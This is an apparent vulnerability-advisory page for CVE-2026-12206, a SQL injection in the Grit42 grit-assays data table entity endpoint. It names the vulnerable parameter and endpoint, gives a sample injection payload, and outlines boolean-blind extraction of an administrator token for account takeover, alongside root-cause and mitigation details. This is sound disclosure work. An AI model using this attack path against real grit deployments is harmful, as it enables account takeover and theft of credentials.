VYPR
← All advisories
Medium severity6.3NVD Advisory· Published Jun 15, 2026

CVE-2026-12206

CVE-2026-12206

Description

SQL injection in Grit42 grit-assays DataTableEntity allows authenticated attackers to extract admin tokens and achieve full account takeover.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

SQL injection in Grit42 grit-assays DataTableEntity allows authenticated attackers to extract admin tokens and achieve full account takeover.

Vulnerability

A SQL injection vulnerability exists in the Grit42 grit platform versions 0.8.0 through 0.11.0, specifically in the Grit::Assays::DataTableEntity model within the file modules/assays/backend/app/models/grit/assays/data_table_entity.rb. The detailed and related class methods interpolate the user-supplied params[:data_table_id] directly into a Rails .joins(string) clause without proper sanitization. Although a preceding DataTable.find(params[:data_table_id]) call coerces the value via to_i, the original string is still passed unchanged into the JOIN, enabling subquery-based injection. The sink was introduced in commit ecb9a7f [1].

Exploitation

An attacker must have an active authenticated session on the grit platform, including accounts with zero roles. The endpoint is GET /api/grit/assays/data_table_entities?data_table_id=&scope=detailed (or any scope invoking the vulnerable methods). By crafting a payload such as 1 OR 1=1, the attacker can inject subqueries into the JOIN clause. Boolean-blind extraction is then performed to brute-force values like the administrator's single_access_token from the grit_core_users table. The exploit is publicly available [1].

Impact

A successful attack allows the attacker to extract the administrator's single_access_token, which can be replayed as a permanent Authorization: Bearer credential, leading to full administrator account takeover. The same SQL injection primitive can read any other column the database role can see, including hashed passwords, password-reset tokens, activation tokens, and second-factor tokens, resulting in complete compromise of authentication and sensitive data disclosure [1].

Mitigation

The vendor (grit42) was contacted but did not respond, and no official patch has been released as of the CVE publication date (2026-06-15). Users are advised to restrict access to the vulnerable endpoint via network controls or web application firewall (WAF) rules, or to disable the grit-assays module if not essential. Upgrading to a future patched version should be applied as soon as it becomes available [1].

References
  1. thoropass-vuln-research-program/2026/SQL Injection in grit42 Data Table Entity Endpoint at main · natanmorette-thoropass/thoropass-vuln-research-program

AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"User-controlled `params[:data_table_id]` is interpolated directly into a raw SQL string passed to Rails' `.joins()` without sanitization, enabling boolean-blind SQL injection."

Attack vector

An authenticated attacker with any active grit account (including zero-role accounts) sends a crafted `data_table_id` parameter to the `GET /api/grit/assays/data_table_entities` endpoint. Because the model declares `entity_crud_with read: []`, no role check is enforced, so even the lowest-privilege user can reach the sink [ref_id=1]. The attacker appends boolean-blind SQL subqueries to the JOIN ON clause, enabling byte-by-byte extraction of any column the database role can see, such as the administrator's `single_access_token` [CWE-89].

Affected code

The vulnerability resides in `modules/assays/backend/app/models/grit/assays/data_table_entity.rb`, specifically in the `self.detailed` and `self.available` class methods at lines 46 and 56. These methods interpolate the user-controlled `params[:data_table_id]` directly into a raw SQL string passed to Rails' `.joins()` call, bypassing ActiveRecord's SQL protections.

What the fix does

The advisory recommends converting `params[:data_table_id]` to an integer via `.to_i` before interpolation, matching the implicit integer coercion already performed by the upstream `DataTable.find()` call [ref_id=1]. This prevents any non-numeric payload from being embedded in the raw SQL JOIN clause. The same `.to_i` fix must be applied in both the `detailed` and `available` class methods.

Preconditions

  • authThe attacker must have an authenticated session on a running grit instance (any role level, including zero-role accounts, is sufficient).
  • configAt least one DataTable record must exist in the database (present in any deployment using grit for its intended purpose).
  • networkThe endpoint must be reachable over HTTP/HTTPS.
  • inputThe attacker supplies a crafted `data_table_id` query parameter containing SQL injection payloads.

Generated on Jun 15, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.